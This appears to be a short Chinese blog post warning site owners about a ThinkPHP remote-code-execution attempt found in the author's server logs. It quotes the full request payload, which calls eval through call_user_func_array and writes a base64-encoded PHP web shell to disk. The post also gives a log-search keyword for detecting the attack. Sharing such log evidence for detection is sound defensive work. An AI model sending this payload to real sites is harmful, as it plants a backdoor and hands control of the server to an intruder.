如果日志中发现这些记录则证明有人尝试入侵你的网站
1 ?s=index/think\\app/invokefunction 2 &function=call_user_func_array 3 &vars[0]=assert 4 &vars[1][]=@eval($_GET[%27fuck%27]); 5 &fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs));
这是在我的网站日志中发现的,看上去应该是基于php框架 phpThink 漏洞操作的,但我压根就没用thinkphp;
大家可以通过查找关键词,比如 搜索日志中包含 call_user_func_array ,的行;
如果你不太确定有没有入侵成功,可以自己拿着参数试一下 .
这些人就不能找个班上吗 每天闲的非要到我这里秀存在感
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· C#/.NET/.NET Core技术前沿周刊 | 第 29 期(2025年3.1-3.9)
· 从HTTP原因短语缺失研究HTTP/2和HTTP/3的设计差异
2019-09-30 想实现网页滚动一定距离底部弹出div